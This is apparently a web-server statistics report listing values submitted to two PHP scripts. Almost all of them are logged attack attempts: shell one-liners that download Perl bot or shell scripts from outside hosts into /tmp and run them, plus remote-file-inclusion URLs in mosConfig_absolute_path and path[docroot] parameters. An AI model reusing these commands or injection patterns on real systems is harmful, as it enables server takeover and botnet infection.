cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	4
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
uname -a	2
cd/var/tmp;id	2
cd /tmp;rm -rf shell;wget http://br.geocities.com/chatbr.ow nz/shell.txt;lwp-download http://br.geocities.com/chatbr.own z/shell.txt;fetch http://br.geocities.com/chatbr.ownz/shell. txt;curl -o shell.txt http://br.geocities.com/chatbr.ownz/sh ell.txt;GET http://br.geocities.com/chatbr.ownz/shell.txt >s hell.txt;lynx -source http://br.geocities.com/chatbr.ownz/sh ell.txt;perl shell.txt;rm -rf shell.txt	1
cd /tmp;rm -rf botnet8;wget http://br.geocities.com/ozaminh a/pacote.txt;lwp-download http://br.geocities.com/ozaminha/p acote.txt;fetch http://br.geocities.com/ozaminha/pacote.txt; curl -o pacote.txt http://br.geocities.com/ozaminha/pacote.t xt;GET http://br.geocities.com/ozaminha/pacote.txt >pacote.t xt;lynx -source http://br.geocities.com/ozaminha/pacote.txt >pacote.txt;perl pacote.txt	1
cd /tmp;wget http://vsffdp.iespana.es/testeinbox2.txt;curl - O http://vsffdp.iespana.es/testeinbox2.txt;fetch http://vsff dp.iespana.es/testeinbox2.txt;lynx http://vsffdp.iespana.es/ testeinbox2.txt;lwp-download http://vsffdp.iespana.es/testei nbox2.txt;perl testeinbox2.txt	1
cd /tmp;wget http://www.scotao.com/scan.txt;curl -O http://w ww.scotao.com/scan.txt;fetch http://www.scotao.com/scan.txt; lynx http://www.scotao.com/scan.txt;lwp-download http://www. scotao.com/scan.txt;perl scan.txt	1
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch http://malware.t35.com/tut.txt;lwp-download http://malware. t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*h ttp://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	1
cd /tmp;wget http://206.71.148.228/bertao.txt;curl -O -f htt p://206.71.148.228/bertao.txt;lynx -source http://206.71.148 .228/bertao.txt;lwp-rget http://206.71.148.228/bertao.txt;fe tch http://206.71.148.228/bertao.txt;perl bertao.txt;rm -rf bertao.txt	1
cd /tmp;rm -rf pacote;wget http://br.geocities.com/ozaminha /pacote.txt;lwp-download http://br.geocities.com/ozaminha/pa cote.txt;fetch http://br.geocities.com/ozaminha/pacote.txt;c url -o pacote.txt http://br.geocities.com/ozaminha/pacote.tx t;GET http://br.geocities.com/ozaminha/pacote.txt >pacote.tx t;lynx -source http://br.geocities.com/ozaminha/pacote.txt > pacote.txt;perl pacote.txt	1
cd /tmp;rm -rf fuck.txt;wget http://h1.ripway.com/renatas2/f uck.txt;fetch http://h1.ripway.com/renatas2/fuck.txt;curl -O http://h1.ripway.com/renatas2/fuck.txt;perl fuck.txt;rm -rf fuck.txt	1
OTHER:	958
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt ;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl -O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t xt	10
OTHER:	960
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;rm -rf hax0rzinhosim;wget http://br.geocities.com/p 4ulo.hack/hax0rzinhosim.txt;lwp-download http://br.geocities .com/p4ulo.hack/hax0rzinhosim.txt;fetch http://br.geocities. com/p4ulo.hack/hax0rzinhosim.txt;curl -o hax0rzinhosim.txt h ttp://br.geocities.com/p4ulo.hack/hax0rzinhosim.txt;GET http ://br.geocities.com/p4ulo.hack/hax0rzinhosim.txt >hax0rzinho sim.txt;lynx -source http://br.geocities.com/p4ulo.hack/hax0 rzinhosim.txt >hax0rzinhosim.txt;perl hax0rzinhosim.txt;rm - rf hax0rzinhosim.txt	1
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch http://malware.t35.com/tut.txt;lwp-download http://malware. t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*	1
cd /tmp;rm -rf *;cd /tmp;lwp-download http://www.mediart.lu/ fr/urb.txt;fetch http://www.mediart.lu/fr/urb.txt;curl -o ur b.txt http://www.mediart.lu/fr/urb.txt;wget http://www.media rt.lu/fr/urb.txt;perl urb.txt;rm -rf urb.txt	1
cd /tmp;rm x.txt;wget http://baixinho.we.bs/x.txt;fetch http ://baixinho.we.bs/x.txt;lwp-download http://baixinho.we.bs/x .txt;curl -O http://baixinho.we.bs/x.txt;lynx http://baixinh o.we.bs/x.txt;perl x.txt	1
cd /tmp;rm -rf pacote;wget http://br.geocities.com/p4ulo.ha ck/pacote.txt;lwp-download http://br.geocities.com/p4ulo.hac k/pacote.txt;fetch http://br.geocities.com/p4ulo.hack/pacote .txt;curl -o pacote.txt http://br.geocities.com/p4ulo.hack/p acote.txt;GET http://br.geocities.com/p4ulo.hack/pacote.txt >pacote.txt;lynx -source http://br.geocities.com/p4ulo.hack/ pacote.txt >pacote.txt;perl pacote.txt;rm -rf pacote.txt	1
cd /tmp;killall perl -9;rm -rf *.txt;GET http://geocities.ya hoo.com.br/xmpzzz/scanz2.txt > scanz2.txt;perl scanz2.txt;rm scanz2.txt	1
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25 0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe rl start.txt;rm start.txt	1
cd /tmp;killall perl -9;rm -rf *.txt;GET http://geocities.ya hoo.com.br/zcrew99/scanz.txt > scanz.txt;perl scanz.txt;rm s canz.txt	1
uname -ahttp://www.neoncomanda.kit.net/tool25.dat?	1
cd /tmp;rm secret.txt;wget http://71.41.190.203/secret.txt;f etch http://71.41.190.203/secret.txt;lwp-download http://71. 41.190.203/secret.txt;curl -O http://71.41.190.203/secret.tx t;lynx http://71.41.190.203/secret.txt;perl secret.txt;rm -r f secret.txt*http://www2.binaryshadow.org:81/~w00t/my/tool/t ool25.dat?	1
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.neoncomanda.kit.net/tool25.dat?	35
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	15
http://216.83.134.89/teste2bot.txt?	15
http://ownsparaficar.googlepages.com/funfo.txt?	13
http://mwebhostx.com.br/x.txt?	12
http://www.panograf.net/ircd/spread.txt?	10
http://201.37.71.117:8090/tool25.txt?	9
http://www.oslutadores.com/?id=23530	9
http://human-design.ru/adm/faqsupport/config/exp667.txt?	7
http://www.ilegais.110mb.com/cmd.txt?	7
Parameter	mosConfig_absolute_pathhttp://trumina.maxihost.com.br/pBOT.t xt??
Value	Accesses
	1
OTHER:	827
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	3
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25 0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe rl start.txt;rm start.txt	3
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;wget http://projectyenor2.iespana.es/goo.txt;curl -O http://projectyenor2.iespana.es/goo.txt;fetch http://projec tyenor2.iespana.es/goo.txt;lynx http://projectyenor2.iespana .es/goo.txt;lwp-download http://projectyenor2.iespana.es/goo .txt;perl goo.txt	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
cd /tmp;rm start.txt;wget http://189.24.38.227/start.txt;fet ch http://189.24.38.227/start.txt;lwp-download http://189.24 .38.227/start.txt;curl -O http://189.24.38.227/start.txt;lyn x http://189.24.38.227/start.txt;perl start.txt;rm start.txt	2
cd /tmp;rm botf.txt;wget http://71.41.190.203/botf.txt;fetch http://71.41.190.203/botf.txt;lwp-download http://71.41.190 .203/botf.txt;curl -O http://71.41.190.203/botf.txt;lynx htt p://71.41.190.203/botf.txt;perl botf.txt;rm -rf botf.txt*	2
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	12
OTHER:	958
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.167.23:9090/s1t2 a3r4t.txt;fetch http://189.24.167.23:9090/s1t2a3r4t.txt;lwp- download http://189.24.167.23:9090/s1t2a3r4t.txt;curl -O htt p://189.24.167.23:9090/s1t2a3r4t.txt;lynx http://189.24.167. 23:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt	2
cd /tmp;wget http://projectyenor2.iespana.es/goo.txt;curl -O http://projectyenor2.iespana.es/goo.txt;fetch http://projec tyenor2.iespana.es/goo.txt;lynx http://projectyenor2.iespana .es/goo.txt;lwp-download http://projectyenor2.iespana.es/goo .txt;perl goo.txt	1
cd /tmp;rm ops.txt;wget http://pemlk.iespana.es/tools/hehehe /ops.txt;fetch http://pemlk.iespana.es/tools/hehehe/ops.txt; lwp-download http://pemlk.iespana.es/tools/hehehe/ops.txt;cu rl -O http://pemlk.iespana.es/tools/hehehe/ops.txt;lynx http ://pemlk.iespana.es/tools/hehehe/ops.txt;perl ops.txt;rm ops .txt?	1
cd /tmp;rm srz.txt;wget http://www.freewebs.com/kctdaporra/s rz.txt;fetch http://www.freewebs.com/kctdaporra/srz.txt;lwp- download http://www.freewebs.com/kctdaporra/srz.txt;curl -O http://www.freewebs.com/kctdaporra/srz.txt;lynx http://www.f reewebs.com/kctdaporra/srz.txt;perl srz.txt;rm -rf srz.txt*	1
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;wget http://www.mateus.t5.com.br/asdasd.txt;fetch ht tp://www.mateus.t5.com.br/asdasd.txt;lwp-download http://www .mateus.t5.com.br/asdasd.txt;curl -O http://www.mateus.t5.co m.br/asdasd.txt;lynx http://www.mateus.t5.com.br/asdasd.txt; perl asdasd.txt;rm -rf asdasd.txt	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
cd /tmp;rm pemlk.txt;wget http://members.lycos.co.uk/enviesc raps/pemlk.txt;fetch http://members.lycos.co.uk/enviescraps/ pemlk.txt;lwp-download http://members.lycos.co.uk/enviescrap s/pemlk.txt;curl -O http://members.lycos.co.uk/enviescraps/p emlk.txt;lynx http://members.lycos.co.uk/enviescraps/pemlk.t xt;perl pemlk.txt;rm -rf pemlk*.txt	2
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch http://malware.t35.com/tut.txt;lwp-download http://malware. t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*	2
	1
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;wget http://decorosso.t35.com/ecolo.txt;fetch http:/ /decorosso.t35.com/ecolo.txt;curl -O http://decorosso.t35.co m/ecolo.txt;lwp-download http://decorosso.t35.com/ecolo.txt; perl ecolo.txt;rm ecolo.txt	1
Parameter	mosConfig_absolute_path
Value	Accesses
http://208.74.174.183/brizola.txt?	16
OTHER:	953
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch http://malware.t35.com/tut.txt;lwp-download http://malware. t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*h ttp://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	2
cd /tmp;wget http://vsffdp.iespana.es/1.txt;curl -O http://v sffdp.iespana.es/1.txt;fetch http://vsffdp.iespana.es/1.txt; lynx http://vsffdp.iespana.es/1.txt;lwp-download http://vsff dp.iespana.es/1.txt;perl 1.txt	1
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm -rf sta.txt*	1
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://chat.wins.com.br:8080/httd.txt?	4
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm teste.txt;wget http://www.zjkjw.gov.cn/teste.txt; fetch http://www.zjkjw.gov.cn/teste.txt;lwp-download http:// www.zjkjw.gov.cn/teste.txt;curl -O http://www.zjkjw.gov.cn/t este.txt;lynx http://www.zjkjw.gov.cn/teste.txt;perl teste.t xt;rm -rf *.txt	1
cd /tmp;rm sta.txt;wget http://start.helloweb.eu/botnet/sta. txt;fetch http://start.helloweb.eu/botnet/sta.txt;lwp-downlo ad http://start.helloweb.eu/botnet/sta.txt;curl -O http://st art.helloweb.eu/botnet/sta.txt;lynx http://start.helloweb.eu /botnet/sta.txt;perl sta.txt;rm sta.txt	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.atkk3.xpg.com.br/bflood.txt?	5
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm sub.txt;wget http://71.41.190.203/sub.txt;fetch h ttp://71.41.190.203/sub.txt;lwp-download http://71.41.190.20 3/sub.txt;curl -O http://71.41.190.203/sub.txt;lynx http://7 1.41.190.203/sub.txt;perl sub.txt;rm -rf *.txt	1
cd /tmp;rm bucetuda.txt;wget http://www.zjkjw.gov.cn/bucetud a.txt;fetch http://www.zjkjw.gov.cn/bucetuda.txt;lwp-downloa d http://www.zjkjw.gov.cn/bucetuda.txt;curl -O http://www.zj kjw.gov.cn/bucetuda.txt;lynx http://www.zjkjw.gov.cn/bucetud a.txt;perl bucetuda.txt;rm -rf *.txt	1
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/toolshttp: //pemlk.iespana.es/tools/pemlk.txt;fetch http://pemlk.iespan a.es/toolshttp://pemlk.iespana.es/tools/pemlk.txt;lwp-downlo ad http://pemlk.iespana.es/toolshttp://pemlk.iespana.es/tool s/pemlk.txt;curl -O http://pemlk.iespana.es/toolshttp://peml k.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.es/to olshttp://pemlk.iespana.es/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	1
cd /tmp;rm start.txt;wget http://189.24.167.23:9090/start.tx t;fetch http://189.24.167.23:9090/start.txt;lwp-download htt p://189.24.167.23:9090/start.txt;curl -O http://189.24.167.2 3:9090/start.txt;lynx http://189.24.167.23:9090/start.txt;pe rl start.txt;rm start.txt	1
cd /tmp;rm start.txt;wget http://189.24.48.179:8090/start.tx t;fetch http://189.24.48.179:8090/start.txt;lwp-download htt p://189.24.48.179:8090/start.txt;curl -O http://189.24.48.17 9:8090/start.txt;lynx http://189.24.48.179:8090/start.txt;pe rl start.txt;rm start.txt?	1
cd /tmp;rm start.txt;wget http://189.24.201.140/start.txt;fe tch http://189.24.201.140/start.txt;lwp-download http://189. 24.201.140/start.txt;curl -O http://189.24.201.140/start.txt ;lynx http://189.24.201.140/start.txt;perl start.txt;rm star t.txt	1
cd /tmp;wget http://projectyenor2.iespana.es/file234.txt;cur l -O http://projectyenor2.iespana.es/file234.txt;fetch http: //projectyenor2.iespana.es/file234.txt;lynx http://projectye nor2.iespana.es/file234.txt;lwp-download http://projectyenor 2.iespana.es/file234.txt;perl file234.txt??	1
OTHER:	963
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;rm -rf *;cd /tmp;lwp-download http://h1.ripway.com/k aiooo/safada.txt;fetch http://h1.ripway.com/kaiooo/safada.tx t;curl -o safada.txt http://h1.ripway.com/kaiooo/safada.txt; wget http://h1.ripway.com/kaiooo/safada.txt;perl safada.txt	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	21
OTHER:	949
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://usuarios.arnet.com.ar/larry123/nork.txt??	4
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.neoncomanda.kit.net/tool25.dat?	14
http://ownsirc.googlepages.com/botnet.txt?	13
	10
http://gavindegraw.onthestreets.net/flyer/hehe.txt?	10
http://www.freewebs.com/yahwek/phpbot.txt?	9
OTHER:	914
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /var/tmp;id	3
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.freewebs.com/yahwek/sete.txt?	3
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.catim.com/legislacao/suntik/r57?	8
OTHER:	962
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.superlab.jazztel.es/safe.gif?	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;killall -9 perl;wget http://projectyenor2.iespana.es /kkk.txt;curl -O http://projectyenor2.iespana.es/kkk.txt;fet ch http://projectyenor2.iespana.es/kkk.txt;lynx http://proje ctyenor2.iespana.es/kkk.txt;lwp-download http://projectyenor 2.iespana.es/kkk.txt;perl kkk.txt??	1
cd /tmp;wget http://h1.ripway.com/marley/tut.txt;perl tut.tx t;rm tut.txt	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://raptortx.googlepages.com/ind.txt??	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm subale.txt;wget http://71.41.190.203/subale.txt;f etch http://71.41.190.203/subale.txt;lwp-download http://71. 41.190.203/subale.txt;curl -O http://71.41.190.203/subale.tx t;lynx http://71.41.190.203/subale.txt;perl subale.txt;rm -r f *.txt	2
cd /tmp;rm bot123ffiii.txt;wget www.xsenharox.xpg.com.br/bot 123ffiii.txt;fetch www.xsenharox.xpg.com.br/bot123ffiii.txt; lwp-download www.xsenharox.xpg.com.br/bot123ffiii.txt;curl - O www.xsenharox.xpg.com.br/bot123ffiii.txt;lynx www.xsenharo x.xpg.com.br/bot123ffiii.txt;perl bot123ffiii.txt	2
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://joaobenner.fileave.com/script9.txt??	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;wget http://www.spamaqueveminfo.com/toma.txt;curl -O http://www.spamaqueveminfo.com/toma.txt;fetch http://www.sp amaqueveminfo.com/toma.txt;lynx http://www.spamaqueveminfo.c om/toma.txt;lwp-download http://www.spamaqueveminfo.com/toma .txt;perl toma.txt	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://chat.wins.com.br:8080/httd.txt	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	list
Value	Accesses
1	9
OTHER:	961
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://joaobenner.fileave.com/scipt9.txt??	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm ful.txt;wget http://71.41.190.203/ful.txt;fetch h ttp://71.41.190.203/ful.txt;lwp-download http://71.41.190.20 3/ful.txt;curl -O http://71.41.190.203/ful.txt;lynx http://7 1.41.190.203/ful.txt;perl ful.txt;rm -rf ful.txt*	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://ilegals.ifrance.com/enos???	2
http://www.gratisweb.com/atk33/rave.txt?	2
http://c4sh1234.100free.com/sc.gif?	2
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.vsm.gov.tr/gorselbasin/docs/gorselbasin/aw128.txt ?	10
OTHER:	960
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.modelismo.alternativo.nom.br//poll/polldata/readm e.txt??	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm bot.txt;wget http://www.zendurl.com/d/ddteam/bot. txt;fetch http://www.zendurl.com/d/ddteam/bot.txt;curl -O ht tp://www.zendurl.com/d/ddteam/bot.txt;lynx http://www.zendur l.com/d/ddteam/bot.txt;perl bot.txt;rm -rf bot.txt;rm -rf bo t.txt.1;rm -f bot.txt.2;rm -f bot.txt.3;rm -f bot.txt.4	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://mtvktv.no-ip.org/php.txt?	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://usuarios.arnet.com.ar/larry123/ka.txt?	9
OTHER:	961
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.pucorp.t5.com.br/sub.txt?	2
http://www.capsoir.com/images/TRA.txt	2
www.snock.110mb.com/shellbot2.txt??	1
http://tigerz.host.sk/c.txt?	1
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm pemlk.txt;wget http://189.24.81.113:8080/pemlk.tx t;fetch http://189.24.81.113:8080/pemlk.txt;lwp-download htt p://189.24.81.113:8080/pemlk.txt;curl -O http://189.24.81.11 3:8080/pemlk.txt;lynx http://189.24.81.113:8080/pemlk.txt;pe rl pemlk.txt;rm pemlk.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.mateus.t5.com.br/tool25.txt?	1
http://freewebs.com/normancito/prot.txt??	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://enigmax1.kit.net/ownz.txt;l wp-download http://enigmax1.kit.net/ownz.txt;fetch http://en igmax1.kit.net/ownz.txt;curl -o ownz.txt http://enigmax1.kit .net/ownz.txt;GET http://enigmax1.kit.net/ownz.txt >ownz.txt ;lynx -source http://enigmax1.kit.net/ownz.txt >ownz.txt;per l ownz.txt;rm -rf ownz.txt	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://63.247.81.138/~ucrol/maya1.txt???	1
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt?	1
http://freewebs.com/0m4rc170/asd.txt?	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.powerbikes.gr/forum/tool25.txt?	18
OTHER:	952
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://lordxpl.xpg.com.br/own.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.h4x0r-s.kit.net/tool/tool25.dat?	9
OTHER:	961
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.apburo.ru/classes/adodbt/gabriel.txt?	1
http://spam.219.googlepages.com/pbot.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://nartok.com/CMS/cache/traira.txt?	8
OTHER:	962
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://usuarios.arnet.com.ar/larry123/prot.txt??	1
http://n0gr0d.t35.com/php.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet ch http://189.24.138.40/start.txt;lwp-download http://189.24 .138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn x http://189.24.138.40/start.txt;perl start.txt;rm -rf *.txt	1
